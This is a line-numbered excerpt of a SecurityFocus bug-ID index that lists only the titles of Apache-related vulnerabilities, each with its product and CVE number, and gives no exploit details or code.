13706| SecurityFocus - https://www.securityfocus.com/bid/:
13707| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
13708| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
13709| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
13710| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
13711| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
13712| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
13713| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
13714| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
13715| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
13716| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
13717| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
13718| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
13719| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
13720| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
13721| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
13722| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
13723| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
13724| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
13725| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
13726| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
13727| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
13728| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
13729| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
13730| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
13731| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
13732| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
13733| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
13734| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
13735| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
13736| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
13737| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
13738| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
13739| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
13740| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
13741| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
13742| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
13743| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
13744| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
13745| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
13746| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
13747| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
13748| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
13749| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
13750| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
13751| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
13752| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
13753| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
13754| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
13755| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
13756| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
13757| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
13758| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
13759| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
13760| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
13761| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
13762| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
13763| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
13764| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
13765| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
13766| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
13767| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
13768| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
13769| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
13770| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
13771| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
13772| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
13773| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
13774| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
13775| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
13776| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
13777| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
13778| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
13779| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
13780| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
13781| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
13782| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
13783| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
13784| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
13785| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
13786| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
13787| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
13788| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
13789| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
13790| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
13791| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
13792| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
13793| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
13794| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
13795| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
13796| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
13797| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
13798| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
13799| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
13800| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
13801| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
13802| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
13803| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
13804| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
13805| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
13806| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
13807| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
13808| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
13809| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
13810| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
13811| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
13812| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
13813| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
13814| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
13815| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
13816| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
13817| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
13818| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
13819| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
13820| [100447] Apache2Triad Multiple Security Vulnerabilities
13821| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
13822| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
13823| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
13824| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
13825| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
13826| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
13827| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
13828| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
13829| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
13830| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
13831| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
13832| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
13833| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
13834| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
13835| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
13836| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
13837| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
13838| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
13839| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
13840| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
13841| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
13842| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
13843| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
13844| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
13845| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
13846| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
13847| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
13848| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
13849| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
13850| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
13851| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
13852| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
13853| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
13854| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
13855| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
13856| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
13857| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
13858| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
13859| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
13860| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
13861| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
13862| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
13863| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
13864| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
13865| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
13866| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
13867| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
13868| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
13869| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
13870| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
13871| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
13872| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
13873| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
13874| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
13875| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
13876| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
13877| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
13878| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
13879| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
13880| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
13881| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
13882| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
13883| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
13884| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
13885| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
13886| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
13887| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
13888| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
13889| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
13890| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
13891| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
13892| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
13893| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
13894| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
13895| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
13896| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
13897| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
13898| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
13899| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
13900| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
13901| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
13902| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
13903| [95675] Apache Struts Remote Code Execution Vulnerability
13904| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
13905| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
13906| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
13907| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
13908| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
13909| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
13910| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
13911| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
13912| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
13913| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
13914| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
13915| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
13916| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
13917| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
13918| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
13919| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
13920| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
13921| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
13922| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
13923| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
13924| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
13925| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
13926| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
13927| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
13928| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
13929| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
13930| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
13931| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
13932| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
13933| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
13934| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
13935| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
13936| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
13937| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
13938| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
13939| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
13940| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
13941| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
13942| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
13943| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
13944| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
13945| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
13946| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
13947| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
13948| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
13949| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
13950| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
13951| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
13952| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
13953| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
13954| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
13955| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
13956| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
13957| [91736] Apache XML-RPC Multiple Security Vulnerabilities
13958| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
13959| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
13960| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
13961| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
13962| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
13963| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
13964| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
13965| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
13966| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
13967| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
13968| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
13969| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
13970| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
13971| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
13972| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
13973| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
13974| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
13975| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
13976| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
13977| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
13978| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
13979| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
13980| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
13981| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
13982| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
13983| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
13984| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
13985| [90482] Apache CVE-2004-1387 Local Security Vulnerability
13986| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
13987| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
13988| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
13989| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
13990| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
13991| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
13992| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
13993| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
13994| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
13995| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
13996| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
13997| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
13998| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
13999| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
14000| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
14001| [86399] Apache CVE-2007-1743 Local Security Vulnerability
14002| [86397] Apache CVE-2007-1742 Local Security Vulnerability
14003| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
14004| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
14005| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
14006| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
14007| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
14008| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
14009| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
14010| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
14011| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
14012| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
14013| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
14014| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
14015| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
14016| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
14017| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
14018| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
14019| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
14020| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
14021| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
14022| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
14023| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
14024| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
14025| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
14026| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
14027| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
14028| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
14029| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
14030| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
14031| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
14032| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
14033| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
14034| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
14035| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
14036| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
14037| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
14038| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
14039| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
14040| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
14041| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
14042| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
14043| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
14044| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
14045| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
14046| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
14047| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
14048| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
14049| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
14050| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
14051| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
14052| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
14053| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
14054| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
14055| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
14056| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
14057| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
14058| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
14059| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
14060| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
14061| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
14062| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
14063| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
14064| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
14065| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
14066| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
14067| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
14068| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
14069| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
14070| [76933] Apache James Server Unspecified Command Execution Vulnerability
14071| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
14072| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
14073| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
14074| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
14075| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
14076| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
14077| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
14078| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
14079| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
14080| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
